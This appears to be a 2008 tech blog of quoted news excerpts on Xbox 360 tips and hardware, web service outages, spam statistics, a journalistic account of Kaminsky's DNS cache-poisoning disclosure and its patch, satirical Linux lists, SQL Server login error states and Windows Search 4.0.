That you have to pay a subscription for online gaming, something that's free on other consoles and on the PC, is perhaps the 360's greatest bugbear. Stage your own form of peaceful process by playing online without paying a penny. You'll need XLink Kai, a free app you run from a PC on the same network as the console that tricks the 360 into thinking the internet is a LAN.

So it'll treat remote opponents as though they're in the same room as you – and you don't have to pay for local multiplayer. Clever! One snag – Microsoft has set the 360 to boot out anyone with a ping higher than 30ms, so you'll have to be selective about who you play with. Local chums are best, not your Chinese penpal.

5. Interact with your Xbox 360 music

Hit X whilst playing a music CD or file (whether from the 360's hard drive, an MP3 player you've plugged in, or streamed from a PC) and you'll enter Psychedelic Wonderland. Well, some artful visualisations, anyway. Grab a controller or two (or up to four, as it happens) and start moving thumbpads and pressing buttons to interact with the crazed shifting colours. There are actually some fairly elaborate controls – read the full manual athttp://www.llamasoft.co.uk/x360manual.php. Good at parties, this.

6. Connect your Xbox 360 to a wireless network without an official adaptor

The good news is you don't have to drop £50 on Microsoft's offensively overpriced Wi-Fi adaptor. The bad news is you'll need a laptop with W-Fi to do it. Head to Control Panel – Network Connections (In Windows XP) or Network & Sharing Center – Manage Network Connections (in Vista). Select the Local Area Connection and the Wireless Network Connection at once, then right-click and hit 'bridge connections'.

Disconnect then reconnect to your wireless network, run a network cable from the laptop's Ethernet port to the 360's, and you should be good to go. Unfortunately, you may have to remove the bridge (repeat the above process and you'll see the option) whenever you want to browse the net with the laptop.

7. Play music from your iPod

Not a secret as such, but Microsoft doesn't exactly shout about the fact it plays nice with a device made by uber-rival Apple. Hidden in the depths of the Marketplace, you'll find a teeny download called 'optional iPod support'. Once you've grabbed that, plug in your iPod (iPhones aren't supported yet, sadly) and head to the Media Blade. You'll see your pod appear there, and can now browse its music by album, artist, genre or whatever. It'll also charge via the USB port, usefully.

8. Reset your Xbox 360 video settings

Remember this one if you're in the habit of carrying your console to chum's houses and hooking it up to different displays. It can end up trying to output the wrong signal, so you can't see anything or get a flickering screen. Fortunately, there's a fairly simple fix if this happens. Remove any discs from the tray and turn the thing off. Then turn it on using a gamepad. As it boots, hold down the Y button, then hit and hold the right trigger. The video settings will reset to default, and you'll stop your sobbing.

9. Play any media file, plus online videos on your Xbox 360

Free app Tversity neatly sidesteps the pointless video/audio restrictions Microsoft, Sony and Nintendo alike slap on their consoles, making them able to play any format. Again, you'll need a PC on the same network, but it's a simple matter of installing the program and having it scan the folders you keep your media in. It'll replace the standard network file-sharing system Windows uses, but behaves pretty much the same way at the 360's end. As well as that, it'll convert unsupported files on the fly – though you'll need a pretty beefy PC to do this with large video files, otherwise you'll be waiting ages. You can also add online video URLs on the PC's end – including Youtube – and then access those from the console.

10. Use any HDMI cable and still get digital surround sound

Though the newer 360s have an HDMI output for optimal video quality, they've built the ports in such a way that you can't have the standard component/composite video cable, with its crucial optical audio output, plugged in at the same time as HDMI. Instead, you're supposed to drop a frightening amount of money on the official HDMI cable with audio adapter. Balls to that. See the big plastic box at the end of the standard video cable that connects to the console? Wedge a knife or screwdriver into the join and twist to pop it off. The result looks messy, but is small enough to plug in alongside a standard, cheapo HDMI cable.
[/QUOTE]

Source: www.techradar.com

| Trackback | # 
 Wednesday, September 10, 2008
Wednesday, September 10, 2008 2:32:20 PM UTC ( coding | EN | microsoft | tech | xbox )

[QUOTE]
Here's a video of the Google Tech Talks titled "The Xbox 360 Security System and its Weaknesses" by Michael Steil (mist) and Felix Domke (tmbinc): "After the disaster of the original Xbox, Microsoft put a lot of effort in designing what is probably the most sophisticated consumer hardware security system... "

[/QUOTE]

Source: xbox-linux.org via www.xbox-scene.com

| Trackback | # 
 Thursday, August 21, 2008
Thursday, August 21, 2008 11:21:26 AM UTC ( EN | internet | office | tech )

[QUOTE]
According to Commtouch Software, an average of about 10 million zombie computers worldwide are sending an average of 3 million messages every day. Some time periods indicate a collective peak spam output of 8 million to 10 million messages.

Many of those messages are sent through the top three web-based mail services. Gmail, operated by Google, ranks #3 among the top 10 origins for spam. Yahoo ranks #6, and Hotmail, operated by Microsoft, ranks #7. It's probably not coincidental that the rankings correspond to the popularity of each company's search engines and other online services.

The current top 2 offending domains origins are nearly unheard of by the majority of Internet users. Active-encounter.com, operated by marketing company iLead Media, ranks #1 and authentic-mechanic.com, registered to Tad Asaro, ranks #2. Asaro is registrant of the relatively new BabytoBee.com site.

Commtouch's cost calculator currently indicates that a company with 50 employees, each with an average salary of $50,000 per year, who also receive 25 messages per day - half of which are spam - would spent $14,300 per year as a direct result of dealing with spam.
[/QUOTE]

Source: windowsitpro.com

| Trackback | # 
 Wednesday, August 13, 2008
Wednesday, August 13, 2008 8:38:11 AM UTC ( Apple | EN | Google | internet | mobile | tech )

[QUOTE]
Apple's MobileMe and Google's Gmail online e-mail services suffered hours-long outages Monday, leaving millions of users unable to access their accounts.

Google restored service within about two and a half hours, but it took Apple approximately seven hours to restore full access to its online mail service.

Apple users first reported trouble accessing the service's servers from their desktop mail clients around 2 p.m. Eastern, and in the next several hours, posted several hundred messages on the MobileMe support forum about the outage.

A notice on the service's main support page acknowledged the problem. "MobileMe members are intermittently unable to access MobileMe Mail using a desktop e-mail application, iPhone or iPod touch," said Apple. "Access to www.me.com/mail is unaffected. Service will be restored ASAP. We apologize for any inconvenience."

By 9 p.m. Eastern that notice had been replaced with an all-clear indicator.

Google's Gmail, meanwhile, went offline around 5 p.m. Eastern, and greeted users with a message reading in part, "We're sorry, but your Gmail account is currently experiencing errors."

A little over two hours later, Google added a notice to its Gmail help page that attributed the outage to "the contacts system used by Gmail which is preventing Gmail from loading properly. We are starting to roll out a fix now and hope to have the problem resolved as quickly as possible."

Shortly after that, at about 7:30 p.m., Google declared the outage over. "Users who were temporarily affected by the 502 errors should now be able to access their account," read a message posted to the Gmail Help Discussion forum. "Thanks for your patience while we worked to resolve this issue for everyone."

Apple users were especially livid, in part because they, unlike Gmail's users, pay for their service, and also because of the multiple problems they had with MobileMe since its launch a month ago.

"I'm so disgusted with Apple right now I don't even know what to say," said a user identified as "Furi0us.Bee" in a message posted to the longest forum thread on the subject.

"This is crazy," said another user, "mac_wa," on the same thread. "I have had more down time with my mac/me mail than any other service I've had... and I pay for this."

But Owen Schultz had one of the best takes of any user. "Dear MS Outlook," Schultz started, "I am so sorry about our breakup several year ago. I have been thinking about you a lot since then. Will you please consider taking me back? Just one more chance? I'm sorry about all the horrible things I said about you and your operating system. You were the best I ever had! MobileMe and I are finished!"

MobileMe's travails -- ranging from an extended migration from its predecessor, .Mac, to an 11-day mail outage last month -- prompted Apple's CEO, Steve Jobs, to issue a memo to company employees last week in which he called the rollout "not up to Apple's standards."

Jobs shook up Apple's management team over the series of snafus, and handed responsibility for the service to Eddy Cue, who heads iTunes.
[/QUOTE]

Source: www.infoworld.com

| Trackback | # 
 Friday, August 08, 2008
Friday, August 08, 2008 9:46:48 AM UTC ( bugs | EN | internet | tech )

[QUTOE]

Las Vegas (NV) – The Internet relies on trust, but what if all that trust comes tumbling down?  That’s exactly the problem noted security researcher Dan Kaminsky described today in his Black Hat talk about DNS cache poisoning.  Several months ago, Kaminsky discovered a vulnerability in the DNS protoctol that allowed bogus name information to be sent to other servers and desktop computers – in essence hackers could redirect web surfers, chat clients and even email servers to machines of their choosing.  Specific details about the vulnerability and the ways to exploit it have been kept secret until today …

Kaminsky is the director of penetration testing for IOActive and specializes in playing around with DNS.  He says he found the vulnerability by accident while he was poking around for other “toys”. To fully understand the bug, let’s go into a brief introduction into how DNS or domain name service works.  Network gurus can probably skip the next few paragraphs.

Image

Almost every Internet service you use, from email to web browsing uses DNS convert the easily remembered names like www.google.com, www.youtube.com and others into IP address like 123.456.789.123.  This conversion is needed because people can remember names easier.  Also companies can change names while keeping all their services pointed to the same numerical IP address.
Behind the scenes, DNS servers make this magic happen by holding a database of DNS records which are lists of names with corresponding IP addresses – think of it as a big list of example.com = 123.456.789.123, example2.com = XXX.XXX.XXX.XXX, etc.  Client computers ask for an IP address by sending a DNS request to the server and the server will reply back with the answer.  Of course servers can only hold so much information, and will hand off the request to a more authoritative server, if it doesn’t know the answer.  The requests can be further bounced up the chain until they reach the ultimate or root domain name servers for the Internet.  If these guys don’t know the answer, then the name to IP address mapping doesn’t exist.
Now imagine yourself as a 411 operator who has to find telephone numbers when asked about a certain place - let’s say Outback Steak House in Torrance, California (our favorite place in the world).  On the first call, you’d probably type it into your computer and wait for the answer, but let’s say the place is really popular and you get tons of calls every day for the place.  Eventually, a smart operator would write the number on a Sticky-Note and post it on the monitor for quick retrieval.  Then when a person calls, you simply read the number on the note, rather than taking the time to type it into the computer.  Well this is exactly what DNS servers do in form of cache.
Kaminksy’s DNS bug, as some people are calling it, exploits this cache by sending malicious requests and once a sufficient number of requests have been sent, the hacker can start rewriting the entries.  It’s important to distinguish that the actual records of the DNS server is not corrupted by this bug, rather it’s the entries in the cache itself.
Kaminsky sat down with us afterwards to give us all the gory details that would make the average man’s head explode, but hey that’s why you come to TG Daily isn’t it.  His attack forces your local domain name server (which is probably your Internet router) to basically perform all the work.  The bad guy forces the DNS server to purposely miss the cache by asking for the IP address of crazy domain names like 1.foo.com, 2.foo.com, 3.foo.com.  Your local domain name server won’t know the details so it then asks other servers to obtain the answer.
As requests and replies flow out and back to your local server, the attacker then unleashes a torrent of specially crafted packets to the victim domain name server.  These packets try to guess the transaction ID of the DNS reply which is a number that ranges from 1 to 65536.  The attacker also has to forward the packet to the correct port which in most cases is the default DNS port 53.
The attack is basically a race of a the hacker stream of DNS replies versus the real reply coming from the real DNS server.  Once the victim DNS server receives a reply with a valid transaction ID, the attacker can substitute any IP address for the domain name.  “The hacker’s packet blows away the response from the real server,” Kaminsky told TG Daily.

Image

Kaminsky was kind enough to draw out the attack for us.  The client computer is on the left and the first node to the right is your local domain name server.

Ok, so I’m sure some of you see two big problems with this.  First, how the heck do you guess the correct transaction ID out of more than 65000 numbers and how do you get the local domain name server to issue the query that starts the whole ball rolling?  Kaminsky says most DNS servers simply increment their transaction ids which makes guessing them fairly trivial.  Also some implementations of DNS are run on a buggy random number generator that produces predictable patterns of numbers.  As far as getting the domain name server to issue the query, Kaminsky told use there are at least eight ways that he knows of and probably tons more that he doesn’t.  “Sometimes you can just ask and the server will issue a query, but it’s amazingly easy to get a DNS server to look something up,” he said.

So what does a hacker gain from attacking DNS servers?  According to Kaminsky, owning the .COM dns space would get you pretty much anything you wanted.  Everything from intercepting emails to taking over spam filters could be accomplished.  He even outlined grabbing passwords to webmail and other services by exploiting the “Forgot Your Password” feature used by many vendors.  But perhaps the biggest risk was to SSL security because certificate vendors could be duped into giving certs to bogus companies.

SSL certificate authorities issue the certificates by identifying the applicant through email.  The vendor looks up the domain’s address in WHOIS and then sends an email to the mail address contained in the record.  But if you were able to poison the DNS to redirect Microsoft’s DNS entry, then you could conceivably gain a Microsoft or another large company’s certificate.
Kaminsky found the bug approximately five months ago and initially worked solely with vendors to patch the bug because he feared any leak would invite malicious hackers into taking over the Internet.  “I spent the last few months terrified that companies would have their emails stolen because of a bug I found,” he told us. 
Kaminsky was lambasted by some security researchers because hackers, by their very nature, are quite the peer oriented group.  Those critics were eventually silenced after Kaminsky had a conference call with the doubters.
In a press conference after the talk, Kaminsky told reporters that vendors have been “fantastic” in responding and patching the bug.  Microsoft even hosted a summit on March 31st where Kaminsky and fellow researchers flew to Redmond Washington in a marathon session to hammer out a fix – something that took thousands of man hours and “thousands of pizzas”.
That patch, dubbed the “sledgehammer fix” by Kaminsky, randomized the transaction IDs and upped the range to more than a 100,000,000 possibilities.  Hopefully a competent IT administrator would notice hundreds of millions of malicious packets hitting their DNS servers, Kaminsky said.
On July 8th, most of the major vendors like Microsoft, Sun, Cisco and Red Hat had patched their servers and Kaminksy has stayed in constant contact with major web companies like MySpace, Craigslist and eBay, all in the hopes of educating IT administrators of the problem.  “I’ve been on the phone a lot, a whole lot,” he said, adding that he doesn’t want to look at his mobile phone bill for the last month.
But Kaminsky warns that the danger isn’t completely over and that the next bug may not come with as much warning and the hacker finding it may not be as considerate.  “They probably won’t be as friendly as me,” he said.
[/QUOTE]

Source: www.tgdaily.com

| Trackback | # 
 Wednesday, July 30, 2008
Wednesday, July 30, 2008 10:18:46 AM UTC ( EN | microsoft | tech | xbox )

[QUOTE]
Electric Tuner over at the xbox-underground.net forums posted what seems to be the first picture of the Xbox360 'Opus' Motherboard.

The 'Opus' is a 'Falcon' generation motherboard designed to fit in a Xenon case. So that means a 90nm GPU, a 65nm CPU and no HDMI port. Microsoft will probably mostly use these boards to return to people suffering from the RRoD on Xenon boards. That seems to match the with the picture below ... it has no HDMI port and while we cannot see the CPU/GPU chips it uses the new CPU heatsink and has less inductors next to the CPU which indicates it uses the 65nm chip. Also notice how this Opus board has the HANA scaler/video chip (like the zephyr/falcon boards) ... so it's maybe not impossible to hack your own native HDMI port to these motherboards.

 Xbox 360 Opus Motherboard

Picture News-Source: xbox-underground.net
[/QUOTE]

Source: www.xbox-scene.com

| Trackback | # 
 Tuesday, July 22, 2008
Tuesday, July 22, 2008 7:53:52 AM UTC ( EN | microsoft | tech | xbox | xbox live )

[QUOTE]
General Manager of XBox Live has spoken of even more new features he expects to come to the Xbox Live dashboard - including the ability to control your console over the internet, and ultimately a hardware-free future. He also confirmed that hard drive installs will work with all current and future Xbox games.

Speaking to OXM at E3, Marc Whitten said that the new update is "only the beginning" of the social networking features that Microsoft want to deploy.
He also said that we can expect future updates to include the ability to switch on your Xbox from any PC and download content to it remotely - "at some point in the future you'll hear more from us about that."

Asked if we'd ever be able to copy DVDs to the hard drive like the newly-added game install process, he said that was an "evil world" and he didn't fancy talking to the lawyers about making it happen.
[/QUOTE]

Source & full interview: OXM.co.uk

| Trackback | # 
 Friday, July 18, 2008
Friday, July 18, 2008 11:51:28 PM UTC ( EN | microsoft | tech | xbox )

[QUOTE]
One of the not-so-cosmetic changes in the fall update will be the ability to let you play your games directly from the hard disk. The new feature will let users install all of the game content directly onto the hard drive to improve game load times. Microsoft reports that it has seen a 30 percent improvement in load times in internal testing. As an interesting data point, Microsoft went out of its way to tell a group of reporters that the full Devil May Cry 4 hard disk installation took roughly 10 minutes on the Xbox 360. The installation took twice as long when we conducted our own installation tests on the PlayStation 3. Another side benefit of having games installed on the hard disk is reduced noise, since the optical disc no longer needs to spin up. However, you will still need to have the game disc in your optical drive while you're playing it, presumably as a piracy check.
[/QUOTE]

Source: gamespot.com via xbox-scene.com

| Trackback | # 
Friday, July 18, 2008 11:47:13 PM UTC ( EN | science | tech )

[QUOTE]

We don't have too many cameras out there in space past the moon, which is why most of our space shots are either looking outward, such as the shots taken by Hubble, or taken of Earth from the moon or closer. Which is why this video is so astounding. It's a video of the moon passing directly in front of the Earth, taken by NASA's EPOXI spacecraft from a whopping 31 million miles away.

The quality isn't the best, but it doesn't need to be; it's still absolutely breathtaking. This is an alien's-eye view, my friends, seen for the very first time. Amazing.
[/QUOTE]

Source: Bad Astronomy via Neatorama

| Trackback | # 
Friday, July 18, 2008 11:05:28 AM UTC ( EN | funny | linux | tech )

[QUOTE]
Nice! I just found this site off of reddit: Why Linux is Better.com. Fortunately for me, it reads like a talking point manual for your local neighborhood Linux zealot. I thought we might have a bit of fun with this one.

  • Forget about viruses. I think we went over that already.
  • Is your system unstable? Who knew. When a system doesn't do anything, it doesn't crash. Oops, there goes NFS. Locked desktop. Oops I changed my IP address. Locked desktop.
  • Linux protects your computer. What does that even mean? It sounds the same as the first one.
  • Don't pay $300 for your operating system... but spend 10 weekends setting it up.
  • Freedom! Yes, free yourselves form the shackles of sanity.
  • When the system has installed, why would you still need to install stuff? Because the person that creates my OS can't possibly package everything? Duh?
  • Update all your software with a single click... as long as you only want the selection and the versions that your distro provides. Don't you dare visit upstream websites.
  • Why copy software illegally if you can get it for free? Why spend hours making free software barely work when you can pay $50 and get on with your life?
  • Need new software? Don't bother search the web, Linux gets it for you... only if your distro has packaged it. Need software that's actually useful? Don't bother searching the web. It's not there. If it's even remotely useful, then your distro has probably already included it in a sad attempt to match the functionality of other platforms. Need legal dvd playback? playback of DRM'ed files? FAIL.
  • Does your digital life seem fragmented? No? Does anyone care? Is it so hard to click three buttons to defragment?
  • Choose what your desktop looks like... to make yourself feel better about it not being able to do anything. At least its pretty. At least your mom's pretty.
  • Why does your Windows get slower day after day? Because you install a shit-ton of crap on it? If the same large selection of software could run on Linux, lusers would be having all the same problems.
  • Do something for the environment. Seriously? how about making serious power saving work for desktops. Who cares about paper boxes. Tons of software on other platforms are distributed electronically. It's not like distributing linux ISO's saves any CD's either.
  • Enjoy free and unlimited support. By that you mean unlimited quantity, but of rather limited quality.
  • Use MSN, AIM, ICQ, Jabber, with a single program. Yea, cuz you can't do that on Windows or Mac.
  • Too many windows? Use workspaces. Yes. Spaces. Or Virtuawin.
  • Don't wait years for bugs to be solved, report and track them down... then wait years for them to actually get fixed.
  • Are you tired of restarting your computer all the time? Why yes actually. Ubuntu seems to want to restart when there's a kernel or X update, which seems like every few days.
  • Let your old computer have a second life...by using a Windows 2000-era operating system. Turns out Win2000 runs pretty damn well on that computer too.
  • Play hundreds of games for free. The world doesn't need more than freecell and spider solitaire (and maybe pinball). Just imagine the decline in office productivity if there were more games.
  • Help other countries, and your own. Yes, teach your citizens to program on OS'es which nobody runs, so that when they can locally develop software, there'll be nobody around to buy it. Surely, the rich countries with the cushy jobs are all looking for XO and KOffice experts.
  • Get a great music player. Your example is amarok? Wasn't that whole gnome 3.0 tabs thing making fun of amarok? oh it wasn't? my bad... I was so certain that it was.
  • Keep an eye on the weather. Because only Linux can display two digits with an optional C or F in a blurry font, and an icon of a sun.

Sorry, that was too easy. This site spreading all these lies can have Google ads but not mine? not cool.
[/QUOTE]

Source: linuxhaters.blogspot.com

| Trackback | # 
Friday, July 18, 2008 10:43:26 AM UTC ( EN | funny | linux | tech )

[QUOTE]
Ok, here's a new column for you guys. Y'all have been getting better at sending me links to posts and articles of freetards and lusers making asses of themselves. So I'll collect them and list them, and we can all have a laugh.

[/QUOTE]

Source: linuxhaters.blogspot.com

| Trackback | # 
 Wednesday, July 09, 2008
Wednesday, July 09, 2008 10:10:44 AM UTC ( coding | EN | funny | linux | tech )

[QUOTE]
Newb guide #4. Suck it.

  • Pick versions of the kernel, glibc, gcc, that are different from all other distros. So that you too, can "Think Different," or at least claim that you have the newest kernel among all distros for the next 2 weeks.
  • Pick a color. Make your distro's default desktop look that color. Beware that blue, green, red, and brown are taken. This is your distro's branding you see? Having a consistent color increases usability, even more so than having usable apps.
  • Make sure your distro's name has at least two intuitive pronunciations, so that you as the maintainer can be a dick and correct everyone who says it wrong.
  • Take tons of screenshots showing that you can run all the same damn apps as every other distro.
  • Don't mention any detailed information about what kind of hardware your distro is known or not known to work on.
  • Say that it's "community tested," but mean that you personally haven't tested it all.
  • Have a snazzy website with a bunch of gradients. Preferably blending from your color of choice (see above) to white. Copy Apple websites as much as possible.
  • Use a different package format from all other distros
  • Failing that, use a similar package format, but make sure all your packages are incompatible
  • Definitely be sure to have your own package updating mechanism. I mean, if you can't even write that code yourself, how are we to trust you?
  • Make sure you have a freetard version. Undo all the useful integration work you did with proprietary binaries that people want to use.
  • Release new, barely tested bits every 6 months and claim that it is a sign of progress.
  • Make sure you're LSB compliant. Also make sure that that means absolutely nothing.
  • Never admit that your distro could be achieved by just reconfiguring another distro.
  • Do one thing right that every other distro gets wrong. Make sure that the solution you come up with only works in your distro.
  • Have a forum where users of your distro can complain to each other. Make sure this forum allows users to have signatures that tell me about all the hardware they've wasted by running your distro.
  • Have a brainstorm site where users can point out the most obvious problems and make you look like an idiot.
  • Have a bugzilla, but don't ever fix any of the bugs. Blame them all on upstream, then don't tell upstream about the problems.
  • Make sure every upstream package has at least two patches. This differentiates your product, see?
  • Have a newsletter. Make sure this newsletter has a column to introduce random users of your distro who are total nerds and haven't made a cent from all the work they put into their configuration.
  • Write tons of documentation on complicated procedures to make things work, instead of making things work.

[/QUOTE]

Source: http://linuxhaters.blogspot.com/

| Trackback | # 
 Monday, July 07, 2008
Monday, July 07, 2008 4:15:32 PM UTC ( EN | microsoft | tech )

[QUOTE]
In continuing with the theme of understanding error messages I'll discuss the "login failed" messages that are surfaced by the client and written to the server's error log (if the auditlevel is set to log failures on login which is the default) in the event of an error during the login process.

If the server encounters an error that prevents a login from succeeding, the client will display the following error mesage.

Msg 18456, Level 14, State 1, Server <server name>, Line 1
Login failed for user '<user name>'

Note that the message is kept fairly nondescript to prevent information disclosure to unauthenticated clients.   In particular, the 'State' will always be shown to be '1' regardless of the nature of the problem.  To determine the true reason for the failure, the administrator can look in the server's error log where a corresponding entry will be written.  An example of an entry is:

2006-02-27 00:02:00.34 Logon     Error: 18456, Severity: 14, State: 8.

2006-02-27 00:02:00.34 Logon     Login failed for user '<user name>'. [CLIENT: <ip address>]

n
The key to the message is the 'State' which the server will accurately set to reflect the source of the problem.  In the example above, State 8 indicates that the authentication failed because the user provided an incorrect password.  The common error states and their descriptions are provided in the following table:
 

ERROR STATE

ERROR DESCRIPTION

2 and 5

Invalid userid

6

Attempt to use a Windows login name with SQL Authentication

7

Login disabled and password mismatch

8

Password mismatch

9

Invalid password

11 and 12

Valid login but server access failure

13

SQL Server service paused

18

Change password required

 
Other error states indicate an internal error and may require assistance from CSS.
 
Il-Sung Lee
Program Manager, SQL Server Protocols
[/QUOTE]
 
| Trackback | # 
 Wednesday, June 11, 2008
Wednesday, June 11, 2008 6:46:27 PM UTC ( Apple | EN | markets | tech )

Steve Jobs WWDC Keynote

For those who missed Steve Jobs WWDC keynote, here's a nice 60-second summarized version that basically shows everything you need to know about the iPhone 3G. 

| Trackback | # 
Wednesday, June 11, 2008 6:36:36 PM UTC ( EN | microsoft | tech | xbox )

[QUOTE]
When Microsoft Corp. announced a mammoth global recall of its Xbox 360 a year ago, the software giant never disclosed the exact source of the game console's heat problem that led to the fiasco.

Now, in an unlikely venue at Design Automation Conference here, Bryan Lewis, research vice president and chief analyst at Gartner, disclosed that the problem started in a graphic chip. Lewis offered this offhand revelation while discussing the changing ASIC and ASSP landscape for his DAC audience.

The Xbox 360 recall a year ago happened because "Microsoft wanted to avoid an ASIC vendor," said Lewis. Microsoft designed the graphic chip on its own, cut a traditional ASIC vendor out of the process and went straight to Taiwan Semiconductor Manufacturing Co. Ltd., he explained.

But in the end, by going cheap--hoping to save tens of millions of dollars in ASIC design costs, Microsoft ended up paying more than $1 billion for its Xbox 360 recall.

To fix the problem, Microsoft went back to an unnamed ASIC vendor based in the United States and redesigned the chip, Lewis added. (Based on a previous report, the ASIC vendor is most likely the former ATI Technologies, now part of AMD.)

Asked the moral of the story, Lewis said: "Had Microsoft left the graphics processor design to an ASIC vendor in the first place, would they have been able to avoid this problem?

"Probably. The ASIC vendor could have been able to design a graphics processor that dissipates much less power."

During Microsoft's conference call with analysts in July 2007, Robbie Bach, head of Microsoft's Entertainment and Devices division, withheld details of the Xbox 360 problem, other than calling it a "design issue." When pressed by an analyst if it was caused by Xbox production or assembly, Microsoft's Bach said at that time, "No."

He added: "Our partners are doing good work." Rather, "the challenge" was created by "Microsoft-initiated design,"Bach said.

Although some system companies have been experimenting with direct links to foundries by cutting out the ASIC design houses, the death of ASICs may have been greatly exaggerated. More accurately, "many ASSP companies are designing ASICs for high volume customers," Gartner's Lewis said. The "ASIC market is far from dead, but it trails the ASSP market," he said.

Lewis cited Nokia, the world's largest handset vendor, which has stopped designing its own ASICs. It recently opened up its IC sourcing to various chip vendors beyond usual suspects such as Texas Instruments and STMicroelectronics.

"System OEMs have no business designing ASICs any longer," said Lewis. The reality is that system companies are finding it hard to do enough ASIC designs to keep in-house design teams employed.

When it was pointed out that Microsoft still has its own semiconductor technology group that is still designing various chips, Lewis responded, "How many ASICs per year does Microsoft design? Not many" compared to experienced ASIC/ASSIP vendors.

Microsoft did not respond to requests to comment on this story.
[/QUOTE]

Source: http://www.eetimes.com/

| Trackback | # 
 Tuesday, June 10, 2008
Tuesday, June 10, 2008 9:52:47 AM UTC ( EN | internet | tech )

[QUOTE]
One of the biggest “improvements” that Mozilla claims has made its way into Firefox 3 is improved memory usage, in particular, the vanquishing of memory leaks:

"Memory usage: Several new technologies work together to reduce the amount of memory used by Firefox 3 over a web browsing session. Memory cycles are broken and collected by an automated cycle collector, a new memory allocator reduces fragmentation, hundreds of leaks have been fixed, and caching strategies have been tuned."

We’re sorry to have to break it to you, but if you thought it was too good to be true you were right. Firefox still uses a lot of memory – way too much memory for a web browser.

We haven’t seen it reach 1GiB+ like we have with previous versions, but it’s quite normal for Firefox 3 to be sucking up ~300MiB of memory right off the bat, without a memory leak (the difference between memory leaks and normal memory abusage is that in a memory leak you’ll see the memory usage keep increasing the longer the browser is open/in-use).

Firefox Memory Hog

This is a screenshot of Firefox’s memory usage after just a half hour or so with only a couple of HTML-only tabs open. This particular screenshot was taken on Linux where Firefox is using the shared GTK libraries – on our Windows PCs, it’s normal to find Firefox 3 taking up ~350MiB or so on both XP and Vista.

The sad thing is that isn’t caused by one of the memory leaks that plagued previous versions of Firefox. It’s Firefox 3 is supposed to take up that much memory – at least, that’s our assumption given how we’ve never seen it take up less.

Firefox 3 has a number of memory-hogging features added to the mix that are probably at least partially responsible for the absolutely gargantuan memory footprint. For example, Firefox now uses an SQL engine to keep track of your history and bookmarks, amongst other things. While that particular feature is powered by SQL-lite, which should – in theory – not take up too much memory, we’re at a loss to explain what else is wasting memory left, right, and center in the world’s most-popular open source web browser.

Things like full-text on-the-fly searching of the web cache for when you type text in the address bar certainly have an impact as well – that’s a lot of stuff to keep in memory at one time. But Opera 9.5 does the same with a lot less memory, so obviously Firefox 3 is doing something wrong.

It’s a shame that Firefox 3 is on the verge of a release and is so terribly unfit to run on any machine – Windows, Linux, or OS X – with less than at least a couple of gigabytes of memory.
[/QUOTE]

Source: http://neosmart.net/

| Trackback | # 
 Monday, June 09, 2008
Monday, June 09, 2008 12:56:10 PM UTC ( EN | markets | microsoft | multimedia | tech | xbox | Zune )

>> From an interview with Robbie Bach, president of Microsoft's entertainment and devices division, on sfgate.com:
[QUOTE]

  • Q: It sounds like you are also seeing advertising opportunities with the Xbox. How do you do that without alienating or aggravating your users?
  • A: Whether it's a phone or the Xbox or the PC, the ideal goal is to make the ad relevant in a part of the experience, as opposed to something that intrudes on the space. In the game space, one of the things we have found is making ads part of the game. If you're in the car racing game and you're driving around the city, product placement works. There are ads in a city. There are billboards in a city. We can place those and we can actually dynamically rotate ads to those locations.
    We've done some very successful campaigns with big, national brands like Nike, Doritos and Toyota that want to get their brand in front of a very desirable target audience. They want to do it in a way that's relevant. People are sponsoring game development contests. They are sponsoring tournaments. Toyota has done that. Toyota has actually launched products in our games where the car will appear in a game. People can race the car and it's a special car that you get for achieving a certain level in the game. There are really creative ways to get people exposure to these things.
  • Q: In January, Warner Bros. announced that it was going to support Blu-ray, the high-definition DVD format. Since then, the rival HD DVD format has gone away. Microsoft supported HD DVD with an Xbox HD DVD attachment. What is your plan there?
  • A: Our plan continues to focus on high-definition experiences. Xbox 360 has a great ability to deliver those through the Xbox Live (online download) service. It's a great way to get the high-definition concept because it's right there. There's no additional media. There is nothing you need to purchase.
    If you look at the Blu-ray player market, you haven't seen the acceleration everybody expected (since the demise of HD DVD). It's not as much about whether all the content is in a Blu-ray format or a HD DVD format. You have to look at how fundamentally compelling the difference is between a progressive scan DVD player and the picture that it can produce and what you get on a high-definition player. The reality is there is some difference, but most people look at it and say, "I am not going to pay extra for that."
  • Q: So no plans for Blu-ray in the next generation Xbox?
  • A: No. There is nothing to even talk about right now with regard to the next generation. That is so far out that there isn't anything to talk about.
  • Q: Just the same, we are coming up on a few years now with the Xbox 360. Is there some point when you start to say that we need to start looking at its replacement?
  • A: There is no real projection on that. The last generation for the Xbox was a little short because we entered the market a little bit later in the cycle. I suspect this time the cycle will be a little bit longer for us.
    In terms of our actual thinking about that, we started thinking about the next generation before we finished creating the last one. It's a continuous process. We're always thinking about new ideas and new things. We don't have anything specific to talk about. There are so many things going on in the current generation that will keep us more than occupied for the foreseeable future.

[/QUOTE]

Source: sfgate.com via xbox-scene.com

| Trackback | # 
 Friday, June 06, 2008
Friday, June 06, 2008 12:36:24 PM UTC ( EN | microsoft | tech | vista )

[QUTOE]
Today we released the final version of Windows Search 4.0 to Microsoft Download Center. Windows Search 4.0 updates search in Windows Vista, Windows XP, Windows Server 2003, Windows Server 2008 and Windows Home Server. This release comes after a public Windows Search 4.0 Preview, which was a success thanks to great community participation - with around 300,000 downloads.   Since the Preview was released, a number of quality improvements have been made to the product based on feedback provided by the community.

Download: Windows Search 4.0 for Windows Vista and Windows Server 2008 (x86)

Download: Windows Search 4.0 for Windows Vista and Windows Server 2008 (x64)

More download packages are available on http://support.microsoft.com/kb/940157.

So, what's new in this release?

First and foremost: we've introduced some performance and reliability improvements. Queries are faster, as is indexing - how much faster depends on your machine and your data. Improved reliability means that system failures won't get in the way of the indexer and all of your data will be scanned and available for searches.

We've also extended remote index discovery, also known as PC-to-PC searches, which allows data to be searched quickly and efficiently across machines running Windows Search 4.0. This means that Windows Vista-to-Windows XP or Windows Vista-to-Windows Server 2008 queries are now possible.

Additionally, Windows Search 4.0 offers manageability improvements that IT Pros should take note of.

For starters, we have extended Group Policy to control more aspects of search functionality and made this control more granular with per-user policies. You can use Group Policy Objects to control how desktop search accesses remote resources - such as Microsoft Exchange Server resources or file shares - to manage network utilization.

Speaking of accessing Microsoft Exchange Server - if your organization selects not to use Microsoft Office Outlook in cached mode, you can set a Group Policy to index Exchange in online mode.  Windows Search 4.0 will then index with minimal impact to the server. Our internal testing of this configuration shows significant decrease in the load on the server and the network as compared to Windows Desktop Search 3.01.

